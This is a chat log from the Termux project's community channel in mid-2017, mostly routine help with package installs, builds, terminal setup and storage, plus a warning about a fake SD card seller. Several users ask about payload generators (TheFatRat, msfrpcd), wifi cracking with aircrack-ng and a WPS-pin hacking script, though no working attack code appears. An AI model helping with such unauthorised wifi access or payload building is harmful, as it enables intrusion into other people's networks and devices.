2017-07-30 14:43:22 gitter (Ashish882) What is ATT
2017-07-30 14:43:47 gitter (Auxilus) @Ashish882 either YouTube or on therir own site offensive security
2017-07-30 14:44:33 gitter (Ashish882) OK
2017-07-30 14:45:13 gitter (sdrausty) https://www.att.com Used to be the only phone service in the USA. Now there are many phone service providers.
2017-07-30 14:45:24 gitter (Auxilus) AT&T bto
2017-07-30 14:45:32 gitter (Auxilus) *bro
2017-07-30 14:45:57 gitter (sdrausty) Yeah AT&T
2017-07-30 14:46:57 gitter (Auxilus) U from states @sdrausty?
2017-07-30 14:47:02 gitter (Ashish882) Can we make payload anymousely
2017-07-30 14:47:24 gitter (sdrausty) @Auxilus Yes, where are you?
2017-07-30 14:47:50 gitter (Auxilus) India
2017-07-30 14:48:04 gitter (Auxilus) Which state? @sdrausty
2017-07-30 14:48:59 gitter (sdrausty) Cool. I have always wanted to visit India and Nepal. I wonder if it will ever happen.
2017-07-30 14:49:30 gitter (Auxilus) Im coming to states in 4 yrs
2017-07-30 14:49:38 gitter (Auxilus) Maybe I’ll make
2017-07-30 14:50:11 gitter (Auxilus) Maybe i can arrange tript for ya
2017-07-30 14:50:15 gitter (Ashish882) Techzindia
2017-07-30 14:50:34 gitter (Auxilus) I need MS
2017-07-30 14:50:54 gitter (sdrausty) I have lived in a number of beautiful states. Now I am in the Great Lake State, Michigan. I really enjoyed California.
2017-07-30 14:51:05 gitter (Auxilus) I heard you guys at us dont need degree to get a job
2017-07-30 14:51:11 gitter (Ashish882) How to use this msfrpcd
2017-07-30 14:51:25 gitter (sdrausty) @Auxilus Maybe
2017-07-30 14:53:07 gitter (Auxilus) Mah man was a flight officer of skme kind at airport, he left the job, now he works at credit card company, he doesn’t have a degree, no connection between these two jobs
2017-07-30 14:54:25 gitter (sdrausty) @Auxilus Degrees are important.
2017-07-30 14:55:00 gitter (sdrausty) @Auxilus That is an exception to the rule.
2017-07-30 14:55:30 gitter (Auxilus) Thats why imma take 1 in mechanical engineering , just in case i get failed to persue astrophysics
2017-07-30 14:55:45 gitter (Auxilus) Typical indian middle class mentality
2017-07-30 14:59:51 gitter (Auxilus) @vishalbiswas how do i clear my command history?
2017-07-30 15:00:01 gitter (Ashish882) @Auxilus @sdrausty where you learn hacking self
2017-07-30 15:09:28 gitter (sdrausty) @Ashish882 I didn’t understand what you are said.
2017-07-30 15:10:38 gitter (sdrausty) @Auxilus Your MS should make your life easier.
2017-07-30 15:13:14 sdrausty are *
2017-07-30 15:21:10 gitter (themastersunil) Unpacking libffi (3.2.1-2) …
2017-07-30 15:21:11 gitter (themastersunil) Selecting previously unselected package libsqlite.
2017-07-30 15:21:11 gitter (themastersunil) Preparing to unpack …/libsqlite_3.19.3-1_aarch64.deb …
2017-07-30 15:21:11 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=597e31a7f5b3458e309693d6]
2017-07-30 15:21:50 gitter (themastersunil) sir, i applied your command before installing python but now you can see..
2017-07-30 15:23:32 gitter (themastersunil) This command I’ve applied before installing python-rm -rf $PRWFIX/lib/python36
2017-07-30 15:23:52 gitter (themastersunil) rm -rf $PRWFIX/lib/python36
2017-07-30 15:24:01 gitter (themastersunil) still problem
2017-07-30 15:49:43 gitter (themastersunil) $ cd $PREFIX/lib/python36
2017-07-30 15:49:43 gitter (themastersunil) bash: cd: /data/data/com.termux/files/usr/lib/python36: No such file or directory
2017-07-30 15:49:43 gitter (themastersunil) $ pwd
2017-07-30 15:49:43 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=597e3857a7b406262d440711]
2017-07-30 15:53:32 gitter (themastersunil) $ pwd
2017-07-30 15:53:32 gitter (themastersunil) /data/data/com.termux/files/home
2017-07-30 15:53:32 gitter (themastersunil) $ $PREFIX/lib/python36
2017-07-30 15:53:32 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=597e393c4bcd78af56fc0a88]
2017-07-30 15:53:43 gitter (themastersunil) No response…
2017-07-30 15:54:34 gitter (themastersunil) @vishalbiswas please help me😥😞
2017-07-30 16:01:33 gitter (Grimler91) @themastersunil try running python in verbose mode: python -v
it should give you more information about where it gets stuck
2017-07-30 21:25:58 live_the_dream ffs …. phone power button is broken its randomly behaving as if power button is on
2017-07-30 21:43:40 gitter (themastersunil) @TermuxBot No, my power button is working properly…
2017-07-30 22:07:05 sdrausty live_the_dream: Is your phone rooted?
2017-07-30 22:51:33 gitter (Auxilus) Dude @Techzindia volume_down key works as control key in termux and volume_up key is alt key, if you press crtl+Q, you will get function keys right above your keyboard, so now, you dont have to change your keyboard each time in video
2017-07-30 23:02:51 live_the_dream yes its rooted
2017-07-30 23:04:47 sdrausty live_the_dream: thank you
2017-07-30 23:07:14 gitter (themastersunil) @TermuxBot Now my phone is rooted.
2017-07-30 23:15:08 sdrausty Mine will remain, unrooted.
2017-07-30 23:16:23 sdrausty I have a live brick. It used to be a smartphone until I tried unrooting it…
2017-07-30 23:19:57 gitter (Auxilus) Im pretty silly about rooting, Im in restaurant, my friend goes “yo dude, there is wifi in here, can you do some’ about it?”
2017-07-30 23:25:15 gitter (themastersunil) Okk
2017-07-30 23:25:29 gitter (themastersunil) Which issue #?
2017-07-30 23:25:40 gitter (themastersunil) #12345
2017-07-30 23:26:40 gitter (Auxilus) Go to http://github.com/termux/termux-packages/issues
2017-07-30 23:26:57 gitter (Auxilus) There should be +
in right upper corner
2017-07-30 23:27:36 gitter (Auxilus) Use that to create new issue
2017-07-30 23:27:55 gitter (Auxilus) Add screenshot and your rom details too
2017-07-30 23:34:00 gitter (themastersunil) python 3.6.2 installation issue #1184
2017-07-30 23:34:35 gitter (Auxilus) Aye, just saw
2017-07-30 23:39:16 gitter (themastersunil) so, what will do developer???
2017-07-31 00:04:57 live_the_dream iv never bricked a phone
2017-07-31 00:13:08 gitter (vishalbiswas) What corrsponds to bricking? A phone is only truly bricked if both its primary and secondary bootloaders are corrupted.
2017-07-31 00:21:36 jrmu I’d like to get vim support for taking notes, and maybe a man page reader, but I don’t want to install too large of an environment (I don’t want an entire linux distro on my phone). Is termux right for me?
2017-07-31 00:22:56 gitter (vishalbiswas) jrmu: Yes, just download termux. It’ll bootstrap first, only minimum packages. Then apt install vim
2017-07-31 00:24:51 gitter (Auxilus) @vishalbiswas can we have command termux-sms-all
2017-07-31 00:25:12 gitter (Auxilus) Cz looks like we only have command that cats out inbox
2017-07-31 00:27:31 gitter (vishalbiswas) @Auxilus Create an issue at https://www.github.com/termux/termux-api
2017-07-31 00:39:44 jrmu gitter: thanks. This looks like a very cool project
2017-07-31 00:40:08 gitter (vishalbiswas) jrmu: wait until you get hooked
2017-07-31 00:42:40 jrmu vishalbiswas: :)
2017-07-31 00:43:22 live_the_dream @vishalbiswas there are some bricks you can’t recover from
2017-07-31 00:43:26 live_the_dream it won’t boot anymore
2017-07-31 00:45:04 live_the_dream welp disabled power button in android
2017-07-31 00:46:02 gitter (Auxilus) https://github.com/termux/termux-api/issues/1028
2017-07-31 00:46:13 gitter (vishalbiswas) first thing to do after rooting is creating a nandroid backup. I was too new the first time around. ended up flashing my stock rom
2017-07-31 00:46:44 gitter (vishalbiswas) anyways retrying mongodb, but with wiredtiger disabled
2017-07-31 00:49:01 gitter (Auxilus) @vishalbiswas any chances of making Wireshark to use android’s wifi module rather that keep scanning for external wifi card?
2017-07-31 00:49:20 gitter (vishalbiswas) but what about the gui?
2017-07-31 00:49:24 gitter (Auxilus) Oops
2017-07-31 00:49:47 gitter (Auxilus) I mean aircrack-ng not Wireshark
2017-07-31 00:50:42 gitter (vishalbiswas) you need a wifi driver that does monitor mode. then insmod
that driver (requires root)
2017-07-31 00:51:08 gitter (Auxilus) Android aint got that driver?
2017-07-31 00:51:31 gitter (vishalbiswas) only select few, others you have to compile from source
2017-07-31 00:51:46 gitter (vishalbiswas) been there, done that, hated my life
2017-07-31 00:51:54 gitter (Auxilus) Kk
2017-07-31 00:51:59 gitter (Auxilus) https://github.com/intercepter-ng
2017-07-31 00:52:17 gitter (Auxilus) I used this app on my device, works well
2017-07-31 00:52:40 gitter (Auxilus) I’d like to have it in termux,
2017-07-31 00:54:12 gitter (Auxilus) Looks like its app, not a package… 😅
2017-07-31 00:56:29 gitter (Auxilus) Can we get gui in termux?
2017-07-31 00:57:09 gitter (vishalbiswas) that’s a lot of extra baggage
2017-07-31 00:58:28 gitter (Auxilus) Ye, @fornwall must have to resign his current job and work on termux to get it done
2017-07-31 00:58:50 gitter (Auxilus) I’m cool with non gui tho
2017-07-31 00:59:02 gitter (Auxilus) Gui is for noobs :p
2017-07-31 01:01:08 gitter (vishalbiswas) not exactly, its a community effort and I already have it working in termux. its just that you need to have a lot of useless dependencies installed.
2017-07-31 01:07:51 gitter (Auxilus) You got gui @vishalbiswas?
2017-07-31 01:08:01 gitter (vishalbiswas) libx11 and vnc
2017-07-31 01:08:17 gitter (Auxilus) I can use some gui if you can tell me how I can enable em
2017-07-31 01:08:58 gitter (vishalbiswas) you’ll need to compile some 50 packages yourselves and install them
2017-07-31 01:09:10 gitter (Auxilus) Sure, i can try that
2017-07-31 01:17:47 gitter (vishalbiswas) boost
2017-07-31 01:18:04 gitter (vishalbiswas) i have a package that requires boost for compilation
2017-07-31 01:18:19 gitter (vishalbiswas) but not for linking
2017-07-31 01:19:01 gitter (vishalbiswas) great, missing PKGBUILD’s makedepends
2017-07-31 01:20:47 gitter (vishalbiswas) is it allowed to run ./build-package.sh boost inside your build.sh?
2017-07-31 01:21:19 gitter (vishalbiswas) I guess not. It will also package boost files inside the calling package’s deb then
2017-07-31 01:39:23 live_the_dream what you can do is add it to dependencies then change the control file that lists dependencies at the end of the build
2017-07-31 01:40:57 gitter (vishalbiswas) ```
2017-07-31 01:40:57 gitter (vishalbiswas) src/mongo/db/fts/unicode/string.cpp:277:80: error: invalid operands to binary expression (‘std::pair<const char *, const char *>’ and ‘mongo::StringData::const_iterator’
2017-07-31 01:40:57 gitter (vishalbiswas) (aka ‘const char *’))
2017-07-31 01:40:57 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=597ec2e7329651f46ed87e9a]
2017-07-31 02:10:45 gitter (Techzindia) is kali Chroot Run in Termux? like fedora, Ubuntu chroot….
2017-07-31 02:20:04 gitter (Auxilus) There is termux-chroot
2017-07-31 02:20:11 gitter (Auxilus) @Techzindia
2017-07-31 02:23:35 gitter (themastersunil) #1166
2017-07-31 03:26:56 gitter (suryapoo) Hey peeps…if someone forked my repo on github and I want the new changes that he made to my files…how would I download the files from termux using git?
2017-07-31 03:28:50 gitter (Auxilus) I think git pull
is the command for that purpose Google it
2017-07-31 05:30:18 frumpylava live_the_dream: Why is ncmpcpp compiled with -DNCURSES_WIDECHAR
? What does that do? I’m trying to investigate why this newfangled internet music, that does Full Width Charactersas a meme, messes up ncmpcpp.
2017-07-31 06:22:23 live_the_dream the easy answer is it doesn’t compile without it and our ncurses should in fact suport it
2017-07-31 06:23:46 live_the_dream you using arm or aarch64?
2017-07-31 06:25:32 live_the_dream finally getting new server
2017-07-31 06:27:06 live_the_dream how exactly is it breaking?
2017-07-31 06:47:32 frumpylava live_the_dream: https://oliverse.ch/share/Screenshot_20170731-124624.png
2017-07-31 06:51:00 live_the_dream there is a guy saying fish and utf characters is broken.
2017-07-31 06:52:30 frumpylava zsh seems fine with them
2017-07-31 06:55:47 jrmu if I understand correctly, termux uses apt from debian? So the downloaded packages are signature verified just like apt from debian?
2017-07-31 06:55:47 jrmu I’m going to be downloading from public wifi, I need to make sure this is safe
2017-07-31 06:56:23 live_the_dream the original bootstrap is done via https
2017-07-31 06:56:46 live_the_dream if the pkgs aren’t signed they won’t work
2017-07-31 06:57:03 live_the_dream ao people will know you are downloading pkgs
2017-07-31 06:57:20 live_the_dream but thwy will be un tampered with
2017-07-31 06:57:50 jrmu it’s fine, I don’t mind if they know, I just need to make sure they haven’t been tampered with
2017-07-31 06:58:05 live_the_dream the trusted.gpg is the thing../
2017-07-31 06:58:55 jrmu can I search trusted.gpg for the public key?
2017-07-31 06:59:26 live_the_dream if it matches proper key
2017-07-31 06:59:52 jrmu it would be nice to see either a link of the public key or some documentation somewhere showing me how it all works
2017-07-31 07:00:53 jrmu ah, I see it even has man pages for apt. OK, great :)
2017-07-31 07:00:53 jrmu live_the_dream: thanks for your help, I’ll keep digging to see if I can find more documentation on this
2017-07-31 07:06:05 live_the_dream if you really want to … look at the source or read from apts developers.
2017-07-31 07:06:49 gitter (Auxilus) Frumpylava : what kind of termux window is that in that screenshot? How you got those tab numbers over the top of terminal?
2017-07-31 07:15:32 frumpylava You can also install apt-transport-https, so the packages itself are transmitted via https.
2017-07-31 07:16:41 frumpylava @Auxilus That is tmux. Fully themed out.
2017-07-31 07:17:24 gitter (Auxilus) I use tmux, but dont know how to theme it
2017-07-31 08:34:31 frumpylava live_the_dream: Hey why does ncmpcpp disable SIGWINCH?
2017-07-31 08:34:39 frumpylava live_the_dream: https://github.com/termux/termux-packages/blob/master/packages/ncmpcpp/ncmpcpp.cpp.patch#L10
2017-07-31 08:44:16 gitter (Auxilus) What is default value of $TERM?
2017-07-31 08:45:20 gitter (Auxilus) Auxilus@localhost : export TERM=Xterm-256colour
2017-07-31 08:45:20 gitter (Auxilus) zsh: can’t find terminal definition for Xterm-256colour
2017-07-31 08:45:20 gitter (Auxilus) Auxilus@localhost :
2017-07-31 08:45:53 gitter (Auxilus) Plz help me
2017-07-31 08:46:03 gitter (Auxilus) My terminal broke
2017-07-31 08:46:30 frumpylava export TERM=xterm-256color
2017-07-31 08:47:07 frumpylava @Auxilus you can also restart your shell. This change isn’t permanent.
2017-07-31 08:47:16 gitter (Auxilus) Ty man
2017-07-31 08:47:36 gitter (Auxilus) Can you tell me how you moded tmux?
2017-07-31 09:00:04 frumpylava @Auxilus. It’s just a config file ~/.tmux.conf. You can google around and find tons of them.
2017-07-31 09:30:31 BenL90 Hello, I just create the article about Termux, maybe anyone wanna see it. http://www.tahutek.net/2017/07/termux-terminal-emulator-and-real-linux.html
2017-07-31 09:32:07 BenL90 That’s the link, for now I just do a light code on termux, btw thanks for creating a such great terminal emulator and linux environment for android. I’m welcome for the other video that yesterday I got from a people from Germany, I mean talk about termux, but after it’s subbed, then I’ll put it on my blog. Thanks again btw.
2017-07-31 09:37:40 sdrausty BenL90: Nice article. I have two recommendations for you from my quick review.
2017-07-31 09:39:41 sdrausty Freenode *#termux on Freenode
2017-07-31 09:40:18 sdrausty pkg install
2017-07-31 09:41:29 gitter (sdrausty) Use ``` to get the code quotes
2017-07-31 09:41:48 gitter (sdrausty) `
2017-07-31 09:41:57 BenL_ sdrausty I see,
2017-07-31 09:42:07 BenL_ Okay I’ll Check it
2017-07-31 09:42:26 gitter (sdrausty) Thank you for writing about Termux.
2017-07-31 09:53:53 gitter (kuburan) @TermuxBot BenL90: nice article gan.
2017-07-31 11:51:58 sdrausty I’d like some feedback for https://github.com/termux/termux-packages/issues/1176 please.
2017-07-31 11:52:18 sdrausty Does Anyone Want to Have More Native Space on Device? #1176
2017-07-31 11:58:07 endre sdrausty: what’s the use case for this?
2017-07-31 11:58:15 endre i’m just curious
2017-07-31 12:16:24 sdrausty endre: More native filespace on device for Termux:)
2017-07-31 12:21:27 sdrausty Even though this is a fairly simple issue in Linux (create file > format filesystem in file > mount filesystem in file via loop device), it is impossible in Termux at present.
2017-07-31 12:52:59 gitter (Ashish882) Hi
2017-07-31 12:53:15 gitter (Ashish882) Anyone
2017-07-31 12:53:43 gitter (Ashish882) How to install TheFatRat in Termux without error
2017-07-31 13:04:41 gitter (Auxilus) @Ashish882 Have you tried compiling it from source?
2017-07-31 13:05:11 gitter (Ashish882) Git clone
2017-07-31 13:05:44 gitter (Ashish882) Just tell me only that it work in termux or not
2017-07-31 13:06:10 gitter (Auxilus) @Ashish882 i haven’t tried man..
2017-07-31 13:06:38 gitter (Ashish882) Can you try bro
2017-07-31 13:07:18 gitter (Auxilus) Sure, gimme like 5 minutes
2017-07-31 13:08:37 gitter (Ashish882) OK
2017-07-31 13:20:28 gitter (Ashish882) Bhai od
2017-07-31 14:16:42 gitter (Techzindia) I just try but its Require Too many Packages That Not Available In Termux
2017-07-31 14:16:47 gitter (Techzindia) ____ __ ____ __ _ __/__ _/ | ___ ___ _/ | _ |
2017-07-31 14:16:47 gitter (Techzindia) | _) _ \ \ _| _/_ \ \ __\ |
2017-07-31 14:16:47 gitter (Techzindia) | \ / __ _ | \ / __ _ |
2017-07-31 14:16:47 gitter (Techzindia) [full message: https://gitter.im/termux/termux?at=597f740ec101bc4e3ad7e86d]
2017-07-31 14:17:17 gitter (Techzindia) -e \e[0;32m [ ! ] Installing dedendencies for ruby script
2017-07-31 14:17:18 gitter (Techzindia) setup.sh: 260: setup.sh: xterm: not found
2017-07-31 14:17:18 gitter (Techzindia) -e \e[0;32m [ ✔ ] Done installing ….
2017-07-31 14:17:18 gitter (Techzindia) [full message: https://gitter.im/termux/termux?at=597f742d210ac26920408bb9]
2017-07-31 14:17:57 gitter (Techzindia) @TermuxBot What Is Mingw32 ?
2017-07-31 17:49:22 gitter (fornwall) @vishalbiswas we could add build dependency (for e.g. boost), it should be straightforward
2017-07-31 18:04:34 ibanhb Hola
2017-07-31 18:04:51 ibanhb Me interesa este emulator
2017-07-31 18:10:50 ibanhb Exit
2017-07-31 18:13:38 live_the_dream hehe
2017-07-31 18:34:43 live_the_dream you can add that line back frumpylava
2017-07-31 18:35:12 live_the_dream i think it was there due to some peoples small screens
2017-07-31 18:35:45 live_the_dream if i remember correctly
2017-07-31 18:37:58 live_the_dream which i probably don’t since i just woke uo
2017-07-31 18:40:57 live_the_dream probably best to put that back frumpylava
2017-07-31 18:54:08 live_the_dream so yeah only comment out line above that instead of both
2017-07-31 20:11:32 Evolution out of curiosity, how does one disable the hotkeys on a chromebook?
2017-07-31 20:12:00 Evolution I’m finding that for things like irssi the traditional alt+number triggers a hotkey, rather than a window switch
2017-07-31 20:12:08 Evolution I’d very much like that to not be the case
2017-07-31 20:12:08 cottongin can’t yet
2017-07-31 20:12:14 Evolution ugh
2017-07-31 20:12:26 cottongin use esc-#
2017-07-31 20:12:30 sdrausty https://github.com/termux/termux-packages/issues/1176
2017-07-31 20:12:39 sdrausty Has been updated
2017-07-31 20:12:44 cottongin annoying but works
2017-07-31 20:12:51 sdrausty Does Anyone Want to Have More Native Space on Device?
2017-07-31 20:13:45 sdrausty Hi
2017-07-31 20:16:25 Evolution okay, so asking a different way then, does termux allow docking to one side of the screen? alt-leftbracket for example seems to not work
2017-07-31 20:16:42 Evolution it seems to be an off sliver, or full screen
2017-07-31 20:16:47 Evolution I don’t see how to resize it
2017-07-31 20:17:31 cottongin Android app window resizing isn’t supported yet on chromeos
2017-07-31 20:18:14 cottongin aside from full screen and the default sizes for landscape/portrait
2017-07-31 20:18:48 cottongin I think there are some others too but it’s very hit or miss currently
2017-07-31 20:19:35 cottongin you might want to look into running sshd and using hterm/shell to ssh in locally
2017-07-31 20:20:31 cottongin the chrome extension for the shell allows for window resizing and keyboard shortcut overriding
2017-07-31 20:21:42 sdrausty Hello
2017-07-31 20:21:57 live_the_dream ?
2017-07-31 20:22:08 sdrausty sshd rocks
2017-07-31 20:22:38 Evolution yeah, I was hoping to avoid running sshd locally, as I’d have no other reason to do so.
2017-07-31 20:22:39 sdrausty I am here requesting opinions please
2017-07-31 20:22:49 Evolution sshing to other machines is great..
2017-07-31 20:23:03 sdrausty locally rocks if you can spare the CPU
2017-07-31 20:23:12 sdrausty WOE
2017-07-31 20:23:22 cottongin yeah I get that but it’s really the only way to overcome your issues currently
2017-07-31 20:23:22 sdrausty WOE *WOW
2017-07-31 20:23:38 Evolution it seems to be a decent chromebook. picked up an asus flip
2017-07-31 20:24:01 Evolution the intel core m processor seems to be pretty decent to work with
2017-07-31 20:24:02 cottongin the actual flip or c302?
2017-07-31 20:24:12 Evolution c302ca or whatever
2017-07-31 20:24:15 cottongin yeah
2017-07-31 20:24:19 cottongin I have the same
2017-07-31 20:24:22 sdrausty 606 PACKAGES ON DEVICE https://sdrausty.github.io/pages/more
2017-07-31 20:24:56 cottongin termux on it is great
2017-07-31 20:25:01 sdrausty Here is a list of 660 packages that are available for arm computer architecture for Termux on Android as of 2017-07-31.
2017-07-31 20:25:19 cottongin not having to go into dev mode to get a bunch of Linux tools is very handy
2017-07-31 20:25:47 sdrausty handybindeed
2017-07-31 20:26:09 sdrausty b *”\ “
2017-07-31 20:28:31 BrainDamage I’m so horribly annoyed by the lack of fuse in assdroid
2017-07-31 20:29:12 BrainDamage the filesystem is actually the #1 feature of unix,and they gimped t
2017-07-31 20:29:33 live_the_dream yeah security issues
2017-07-31 20:29:50 live_the_dream so only available for rom makers
2017-07-31 20:29:51 Evolution cottongin: out of curiosity, how do you store your work so that it’s sync’d or available? do you do dev in /downloads or something?
2017-07-31 20:30:07 sdrausty t?^_^(TT) BrainDamage:
2017-07-31 20:30:08 Evolution trying to sort out the best place to keep source code I’m working on
2017-07-31 20:30:31 cottongin yeah pretty much that
2017-07-31 20:30:59 BrainDamage what bothers me is that everytime i search for what those “issues” are, i get infinite amount of unrelated results
2017-07-31 20:31:16 cottongin and the sshfs extension to mount my remote stuff
2017-07-31 20:38:06 sdrausty https://sdrausty.github.io/pages/more is automated to update once a day.
2017-07-31 20:39:14 sdrausty This webpage updates from within Termux in an Android smartphone.
2017-07-31 21:49:53 sdrausty $ /system/bin/mount -o loop=/sys/block/loop0 my_big_file mountDirectory512MBtoday/
2017-07-31 21:49:53 sdrausty Usage: /system/bin/mount [-r] [-w] [-o options] [-t type] device directory
2017-07-31 21:50:38 sdrausty https://github.com/termux/termux-packages/issues/1176
2017-07-31 21:50:53 sdrausty Does Anyone Want to Have More Native Space on Device? #1176
2017-07-31 21:53:37 sdrausty $ /system/bin/mount -o loop my_big_file jars/ mountDirectory512MBtoday/
2017-07-31 21:53:37 sdrausty Usage: /system/bin/mount [-r] [-w] [-o options] [-t type] device directory
2017-07-31 22:33:08 gitter (vishalbiswas) sdrausty: I don’t think its possible
2017-07-31 23:06:03 sdrausty vishalbiswas: VDM (Virtual Device Manager)
2017-07-31 23:06:28 sdrausty Maybe that is the package we are looking for.
2017-07-31 23:07:03 sdrausty & mkfs.yaffs2
2017-07-31 23:10:22 sdrausty mount
is in not in util-linux, but that may be irrelevant since mount
comes with Android and no doubt it knows how to mount a native Android filesystem.
2017-07-31 23:11:46 sdrausty This may need to be addressed on termux-app
2017-07-31 23:11:53 sdrausty too
2017-07-31 23:11:59 gitter (vishalbiswas) and no doubt it requires root, all those other solutions you gave requires us to modify user permissions, which cannot be done without root
2017-07-31 23:12:16 zj1995 hello all
2017-07-31 23:12:40 zj1995 i have a feature suggestion for termux regarding handling of terminal bell
2017-07-31 23:13:20 sdrausty If termux-app can have a slider like for storage gor loop = home run
2017-07-31 23:13:21 zj1995 is there a way to show an android notification when the app is backgrounded, or at least provide audible notification?
2017-07-31 23:13:27 sdrausty gor *for
2017-07-31 23:15:06 gitter (vishalbiswas) zj1995: should be possible, you can create an issue at termux-app repo so that the dev can track it
2017-07-31 23:16:21 sdrausty @vishalbiswas How difficult would it be to ask users to grant permission for loop. Just like we do for storage at present.
2017-07-31 23:17:09 gitter (vishalbiswas) does android even provide an abstraction for that? I don’t think
2017-07-31 23:17:44 sdrausty zj1995: https://www.google.com/url?sa=t&source=web&rct=j&url=https://github.com/termux/termux-app/issues/115&ved=0ahUKEwjr_PGtibXVAhUq04MKHUXVDnYQFggdMAA&usg=AFQjCNE55eC7RLL_ubk2wDXJYYfII-m0ug
2017-07-31 23:18:07 sdrausty @vishalbiswas I think it does.
2017-07-31 23:18:37 sdrausty https://github.com/termux/termux-app/issues/115
2017-07-31 23:19:02 sdrausty Support for terminal bell as a notification #115
2017-07-31 23:20:49 gitter (vishalbiswas) does anybody know what __ELF_NATIVE_CLASS
is and what should its value be?
2017-07-31 23:21:40 sdrausty I am considering upgrading my device with 4TB external SD card reader.
2017-07-31 23:23:09 gitter (vishalbiswas) showoff :sparkles:
2017-07-31 23:24:28 sdrausty This will cost with month of air time about $60 at https://www.boostmobile.com
2017-07-31 23:27:17 sdrausty $70 = 512GB micro SD card at https://usadiscountwarehouse.com/shop/512gb-micro-sd-free-shipping-free-usb-adapter/ today!
2017-07-31 23:27:25 sdrausty Free shipping!
2017-07-31 23:27:48 sdrausty Free 64GB micro SD card!
2017-07-31 23:28:35 sdrausty I wonder if it actualy works, but it might be completely legit…
2017-07-31 23:28:53 sdrausty 512 GB in my pocket…
2017-07-31 23:29:12 sdrausty Infinite with OTG…
2017-07-31 23:29:18 gitter (vishalbiswas) http://www.amazon.in/SanDisk-Extreme-512GB-UHS-1-Memory/dp/B00NP699ZI/ref=sr_1_1?ie=UTF8&qid=1501558101&sr=8-1&keywords=512gb+Micro+SD
2017-07-31 23:29:23 gitter (vishalbiswas) $399
2017-07-31 23:29:49 gitter (vishalbiswas) yours may be a gimmick, no brand or model details
2017-07-31 23:31:45 rods-tab3 too low to be true
2017-07-31 23:31:47 sdrausty 512gb Micro SD Card Class 10 + Free Bonus 64GB Micro SD Card fir $70 might be, but I CAN by 128GB for the sane price at the store.
2017-07-31 23:32:03 sdrausty “Name Brand”
2017-07-31 23:33:46 sdrausty rods-tab3: I think I will change the link at https://github.com/termux/termux-packages/issues/1176 to 128GB staples. Thank you.
2017-07-31 23:34:37 sdrausty “Does Anyone Want to Have More Native Space on Device? #1176” Who would not want more of the goid stuff?
2017-07-31 23:35:00 sdrausty goid *good
2017-07-31 23:35:25 sdrausty Could be.. u hum.. gold
2017-07-31 23:38:23 sdrausty vishalbiswas: Is this what we are looking for https://source.android.com/devices/
2017-07-31 23:39:40 sdrausty I would like a little more feedback before opening an issue at termux-app regarding #1176
2017-07-31 23:39:57 sdrausty abstractoin layer?
2017-07-31 23:40:13 sdrausty abstractoin *abstraction
2017-07-31 23:40:20 rods-tab3 BEWARE ripoff https://www.yelp.com/biz/usa-discount-warehouse-cape-coral
2017-07-31 23:42:44 rods-tab3 if ‘‘too good to be true’’ it most certainly is http://m.ripoffreport.com/reports/usadiscountwarehousecom/cape-coral-florida-33909/usadiscountwarehousecom-256gb-microsd-memory-card-is-a-fake-cape-coral-florida-1242830
2017-07-31 23:43:58 sdrausty http://www.frys.com/product/8941013
2017-07-31 23:46:51 sdrausty I am really glad we discussed this rods-tab3: @vishalbiswas
2017-07-31 23:47:46 sdrausty 256GB = $250
2017-07-31 23:47:56 sdrausty USd
2017-07-31 23:48:26 sdrausty Thank you
2017-07-31 23:48:59 sdrausty Either way I want more native space. How sbout you?
2017-07-31 23:49:04 rods-tab3 that seems high; used to be 64GB ~~ $16 USD
2017-07-31 23:49:21 sdrausty That is because it is 256GB
2017-07-31 23:49:40 sdrausty micro SD
2017-07-31 23:51:36 sdrausty Cheapest 128GB micro SD @frys = $40
2017-07-31 23:59:06 gitter (vishalbiswas) anybody here has fast internet and their android device handy?
2017-07-31 23:59:21 sdrausty why?
2017-07-31 23:59:57 gitter (vishalbiswas) I need som configure output from different arches on android
2017-08-01 00:00:06 sdrausty aarch64
2017-08-01 00:00:39 gitter (vishalbiswas) would you be willing?
2017-08-01 00:01:05 sdrausty whatis it you need?
2017-08-01 00:01:15 gitter (vishalbiswas) I can do arm and x86_64 but i686 still remains
2017-08-01 00:01:37 gitter (vishalbiswas) download and extract https://people.freebsd.org/~sunpoet/sunpoet/mozjs-45.0.2.tar.bz2 (source code for spidermonkey)
2017-08-01 00:02:05 gitter (vishalbiswas) then run sh gen-config.sh aarch64 android
2017-08-01 00:02:21 sdrausty and then what? do not ask me to run it, please.
2017-08-01 00:02:56 gitter (vishalbiswas) it generates config files needed for mongodb
2017-08-01 00:04:21 gitter (vishalbiswas) anybody else can volunteer for aarch64 or i686?
2017-08-01 00:07:36 sdrausty $ cd mozjs-45.0.2/
2017-08-01 00:07:36 sdrausty $ sh gen-config.sh aarch64 android sh: 0: Can’t open gen-config.sh
2017-08-01 00:08:37 sdrausty $ ls
2017-08-01 00:08:37 sdrausty INSTALL Makefile.in build dom js media mfbt moz.build nsprpub testing
2017-08-01 00:08:37 sdrausty LICENSE README config intl layout memory modules mozglue python toolkit
2017-08-01 00:09:12 gitter (vishalbiswas) f*#k wrong file
2017-08-01 00:09:29 sdrausty $ find -name gen-config.sh
2017-08-01 00:13:27 gitter (Auxilus) @vishalbiswas i can do that
2017-08-01 00:13:35 gitter (Auxilus) I’m on aarch64
2017-08-01 00:13:58 gitter (vishalbiswas) don’t do this, i messed up the filename
2017-08-01 00:14:08 gitter (Auxilus) Kk
2017-08-01 00:14:09 gitter (sdrausty) @Auxilus it’s the wrong file
2017-08-01 00:14:25 gitter (Auxilus) Okay, i stopped :p
2017-08-01 00:14:46 gitter (Auxilus) I want to make script which will connect to wifi, but not using password, but with wps pin, sort of like what wifi hacking apps do
2017-08-01 00:14:46 gitter (Auxilus) So, which language should I use?
2017-08-01 00:14:46 gitter (Auxilus) Any idea?
2017-08-01 00:14:46 gitter (Auxilus) And also imma run the script though termux
2017-08-01 00:15:13 gitter (vishalbiswas) is there a termux-wifi?
2017-08-01 00:15:29 gitter (Auxilus) No
2017-08-01 00:15:53 gitter (Auxilus) There is termux-wifi-connectioninfo & scaninfo
2017-08-01 00:16:02 gitter (vishalbiswas) I don’t think you can actually connect to wifi without having it in termux-api
2017-08-01 00:16:19 gitter (Auxilus) Can we get it in api?
2017-08-01 00:16:42 gitter (Auxilus) Or is there any language which supports such operations?
2017-08-01 00:17:22 gitter (vishalbiswas) all languages can support it if android would give us core access and not have us try to do it with a hand tied behind
2017-08-01 00:17:47 gitter (Auxilus) Kk
2017-08-01 00:17:57 gitter (vishalbiswas) that’s where sdrausty’s idea of #1176 fails
